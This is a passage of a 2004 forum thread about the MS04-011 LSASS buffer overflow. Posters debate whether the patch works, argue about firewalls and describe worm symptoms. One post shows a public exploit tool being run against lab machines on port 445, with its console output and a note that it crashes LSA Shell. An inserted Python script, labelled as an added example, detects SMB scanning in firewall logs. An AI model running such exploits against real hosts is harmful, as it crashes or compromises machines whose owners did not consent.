
Lsasrv.dll RPC buffer overflow remote exploit

Page 2
Fun? I would have traded some of that fun when Blaster hit and we were caught with our pants down and unprotected
 
Originally posted by: SaigonK
Originally posted by: NogginBoink
Before this thread gets out of hand: I have contacts in the security group at Microsoft. I am finding out if MS04-011 protects against this from the horse's mouth. I suspect that MS04-011 does protect against this, since MS04-011 does include a patch for an lsass vulnerability.

I checked with my Microsoft sources: 04-011 is made to fight this exploit.

http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx

Patch your machines... you should be all set.


Well, it's meant to, but right now we're figuring out if that patch works.
 
I am setting up a test environment with a fresh fully patched deployed XP box. Then I will add the 04-011 patch and see if I can still exploit it.
 
Originally posted by: SaigonK
Fun? I would have traded some of that fun when Blaster hit and we were caught with our pants down and unprotected

Yeah, but you get to stay on your toes and stuff. Not much out of the ordinary happens here at work. Well, usually anyways...
 
Originally posted by: CorporateRecreation
I am setting up a test environment with a fresh fully patched deployed XP box. Then I will add the 04-011 patch and see if I can still exploit it.

I have Microsoft folk doing the same thing. Will report back when I have more info.
 
Originally posted by: SaigonK
Originally posted by: NogginBoink
Before this thread gets out of hand: I have contacts in the security group at Microsoft. I am finding out if MS04-011 protects against this from the horse's mouth. I suspect that MS04-011 does protect against this, since MS04-011 does include a patch for an lsass vulnerability.

I checked with my Microsoft sources: 04-011 is made to fight this exploit.

http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx

Patch your machines... you should be all set.

I've been putting this patch on systems since it came out and networking has been getting reports of people still getting hacked even with this patch. I don't think the patch is fully working against this exploit.
 
Luckily I haven't got caught with this, although I don't have the patch installed. My g/f was lucky enough to get it though and she's on Purdue's network. I just called in to the office to see if they're having any problems. I put in two systems that should prevent anything from happening so I just hope they work.
 
In my test the patch did work; however, we do have machines that are patched that are still being attacked. My conclusion is that the patch does work but only if it's not been exploited or something. More on this when I get it.
 
Originally posted by: CorporateRecreation
In my test the patch did work; however, we do have machines that are patched that are still being attacked. My conclusion is that the patch does work but only if it's not been exploited or something. More on this when I get it.

It could be. With both slammer and blaster it wasn't enough to apply the patch, you also had to kill the bastard process.
 
Originally posted by: Jzero
Originally posted by: CorporateRecreation
In my test the patch did work; however, we do have machines that are patched that are still being attacked. My conclusion is that the patch does work but only if it's not been exploited or something. More on this when I get it.

It could be. With both slammer and blaster it wasn't enough to apply the patch, you also had to kill the bastard process.

AFTER you're infected, yes. Of course.

If you'd patched before slammer or blaster came out you would never have been affected. In those cases, it was about a month between patch and exploit. This time, it's about two weeks. The witty worm was out less than a full day after the patch came out.

Moral: patch your boxes. You no longer have the luxury of waiting for others to test the waters for you.
 
Downloading patch now. Thanks for the heads up. A friend of mine got this before and we couldn't work out what it was... but this definitely seems to be the culprit.
 
Exploit run on Win2k machine with MS04-011 patch:

C:\lsass.exe 1 192.168.1.5 4444 -t

MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---

[*] Target: IP: 192.168.1.5: OS: Win2k Professional [universal] netrap.dll
[*] Connecting to 192.168.1.5:445 ...
[-] Sorry, cannot connect to 192.168.1.5:445. Try again...


Exploit run on WinXP machine without patch:

C:\lsass.exe 1 192.168.1.6 4444 -t

MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---

[*] Target: IP: 192.168.1.6: OS: WinXP Professional [universal] lsass.exe
[*] Connecting to 192.168.1.6:445 ... OK
[*] Detecting remote OS: Windows 5.1


If it's run without the "-t" option, it'll respond with "Attacking ... OK" instead, crash the LSA Shell and initiate Windows' 30-second shutdown. Open a command prompt and run "shutdown -a" to terminate the countdown.

EDIT: typos
EDIT2: I'm getting weird results with the exploit. I patched the WinXP machine and still get the same response. I also ran the exploit locally on the Win2k machine (on 127.0.0.1) and it responded with "Attacking ... OK". Anyone have more definite answers?
EDIT3: Okay, hopefully I got it figured out. The last line (Detecting... or Attacking... ) doesn't indicate the success of the exploit, because it will show the same results whether the system is patched or not. So, I just ran the exploit from a Win98 and Win2k machine against a WinXP machine and successfully crashed LSA Shell. After I patched the WinXP machine, the exploit couldn't crash it (even though the third line remained the same). In conclusion, the patch works. But we knew this by now anyway... :-/
 
I'll reiterate what I said when MSBlaster (both variants) & SQL Slammer were the headlines:

Anyone who has a Windows box with NetBIOS or Samba ports internet accessible is an idiot. It's called a firewall, people. Not one of these things would get through a simple NAT router like the one you would use to share cable/DSL on more than one computer in the default configuration. Holes in Windows on the NetBIOS & Samba ports are not new; this is the 4th time a hole on these specific ports has been patched in the past year. We were using the NetBIOS bugs to crash Windows 3.1 boxes in high school circa 1990.

These modern "virii" require stupidity to spread. Notable exception being corporate LANs that get infected by laptops operated by idiots who take them out of hibernate there.

If a hardware firewall isn't available (because for example, you use your laptop on the road), every software firewall will block these things in the default configuration as well. (except maybe the one built into WinXP)

Firewalls and common sense are far superior virus protection to any patches and/or "anti-virus" software. Unfortunately common sense is a misnomer because it is not common.
 
I'm seeing the effects of the worm tonight. It appears it removes many of Windows' features. I have seen it disable the Run command, remove all icons from the Control Panel, remove the option to shut down the computer (leaving only Log Off), and in some cases remove the ability to use port 80. Of course the RPC shutdowns are there also.

The calls are really starting to pick up on this tonight.
 
Originally posted by: glugglug
I'll reiterate what I said when MSBlaster (both variants) & SQL Slammer were the headlines:

Anyone who has a Windows box with NetBIOS or Samba ports internet accessible is an idiot. It's called a firewall, people. Not one of these things would get through a simple NAT router like the one you would use to share cable/DSL on more than one computer in the default configuration. Holes in Windows on the NetBIOS & Samba ports are not new; this is the 4th time a hole on these specific ports has been patched in the past year. We were using the NetBIOS bugs to crash Windows 3.1 boxes in high school circa 1990.

These modern "virii" require stupidity to spread. Notable exception being corporate LANs that get infected by laptops operated by idiots who take them out of hibernate there.

If a hardware firewall isn't available (because for example, you use your laptop on the road), every software firewall will block these things in the default configuration as well. (except maybe the one built into WinXP)

Firewalls and common sense are far superior virus protection to any patches and/or "anti-virus" software. Unfortunately common sense is a misnomer because it is not common.


Relying solely on firewalls to block this virus is silly... there are many ways that this virus can get in. One very simple way I can think of is email. If an unsuspecting user opens up an email containing this virus, and you don't block those NetBIOS ports from within your LAN (which many corporate Windows users won't, otherwise Windows will be useless), then the virus will spread like wildfire in your LAN. This is what virus writers count on... people's stupidity. They know the virus won't go through firewalls, but they also know people are stupid 🙂
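The two posts above make one practical point between them: the perimeter firewall keeps the NetBIOS/SMB ports (139, 445) off the internet, but once something gets inside the LAN the only warning you get is a host suddenly trying to reach port 445 on many neighbours at once. The script below is an added example, not code from this thread or from any of the posters: it reads firewall or router log lines and flags sources that touch an unusually large number of distinct hosts on those ports inside a short window, which is the worm-like spread the reply describes. The log format, the window and the threshold are assumptions, and the log lines are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# NetBIOS session (139) and direct-hosted SMB (445); the exploit runs in this
# thread connect to TCP 445.
WATCHED_PORTS = {139, 445}

# Constructed sample log (assumed format:
# "YYYY-MM-DD HH:MM:SS ACTION PROTO SRC DST DPORT"). Not real logs.
#   10.0.0.7 sweeps eight neighbours in four seconds (worm-like).
#   10.0.0.9 talks to one file server repeatedly (normal SMB use).
#   10.0.0.3 touches six hosts, but spread over ten minutes (slow, ambiguous).
SAMPLE_LOG = """\
2004-05-01 10:00:01 DROP TCP 10.0.0.7 10.0.1.1 445
2004-05-01 10:00:01 DROP TCP 10.0.0.7 10.0.1.2 445
2004-05-01 10:00:02 DROP TCP 10.0.0.7 10.0.1.3 445
2004-05-01 10:00:02 DROP TCP 10.0.0.7 10.0.1.4 445
2004-05-01 10:00:03 ALLOW TCP 10.0.0.7 10.0.1.5 445
2004-05-01 10:00:03 DROP TCP 10.0.0.7 10.0.1.6 139
2004-05-01 10:00:04 DROP TCP 10.0.0.7 10.0.1.7 445
2004-05-01 10:00:04 DROP TCP 10.0.0.7 10.0.1.8 445
2004-05-01 10:00:05 ALLOW TCP 10.0.0.9 10.0.1.50 445
2004-05-01 10:00:09 ALLOW TCP 10.0.0.9 10.0.1.50 445
2004-05-01 10:00:15 ALLOW TCP 10.0.0.9 10.0.1.50 445
2004-05-01 10:00:20 ALLOW TCP 10.0.0.9 10.0.1.51 80
2004-05-01 10:01:00 DROP TCP 10.0.0.3 10.0.1.10 445
2004-05-01 10:03:00 DROP TCP 10.0.0.3 10.0.1.11 445
2004-05-01 10:05:00 DROP TCP 10.0.0.3 10.0.1.12 445
2004-05-01 10:07:00 DROP TCP 10.0.0.3 10.0.1.13 445
2004-05-01 10:09:00 DROP TCP 10.0.0.3 10.0.1.14 445
2004-05-01 10:11:00 DROP TCP 10.0.0.3 10.0.1.15 445
"""


def parse_line(line):
    """Parse one log line into a dict, or return None if it is malformed."""
    parts = line.split()
    if len(parts) != 7:
        return None
    try:
        ts = datetime.strptime(parts[0] + " " + parts[1], "%Y-%m-%d %H:%M:%S")
        dport = int(parts[6])
    except ValueError:
        return None
    return {"ts": ts, "action": parts[2], "proto": parts[3],
            "src": parts[4], "dst": parts[5], "dport": dport}


def find_scanners(log_text, window_seconds=60, min_targets=5):
    """Return {source_ip: peak distinct destinations} for sources that reached
    at least `min_targets` distinct hosts on a watched port within any
    `window_seconds` span. Both ALLOW and DROP lines count: a dropped attempt
    still shows the host is probing, and an allowed one may have succeeded."""
    window = timedelta(seconds=window_seconds)
    events = [e for e in (parse_line(l) for l in log_text.splitlines())
              if e and e["proto"] == "TCP" and e["dport"] in WATCHED_PORTS]
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)

    flagged = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        start, peak = 0, 0
        # Sliding window over the time-ordered events of this source.
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            distinct = len({e["dst"] for e in evs[start:end + 1]})
            peak = max(peak, distinct)
        if peak >= min_targets:
            flagged[src] = peak
    return flagged


if __name__ == "__main__":
    for src, n in sorted(find_scanners(SAMPLE_LOG).items()):
        print(f"{src}: reached {n} distinct hosts on 139/445 within 60s")
```

With the defaults only 10.0.0.7 is reported; widening the window to 15 minutes also catches the slow 10.0.0.3 sweep, so the window and threshold are the knobs to tune against a baseline of how much SMB fan-out your LAN normally shows (file servers and domain controllers are the usual legitimate high-fan-out hosts and may need an allow-list).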
 
Originally posted by: Xionide
Originally posted by: jfall
Ah... the joys of running Linux.

You say that like it's superior or something. I mean, if Linux were top dog there would be viruses like this for it too.

-Xionide

Sadly, this is true. I'm on both the Microsoft and Red Hat Linux security mailing lists, and lately I've been receiving more security patch notifications from Red Hat than I have from Microsoft. Sure, I usually don't have to reboot my Red Hat boxes for the patches to take effect like I do on the Microsoft boxes, but it's still a pain to have to patch these systems once a week.
 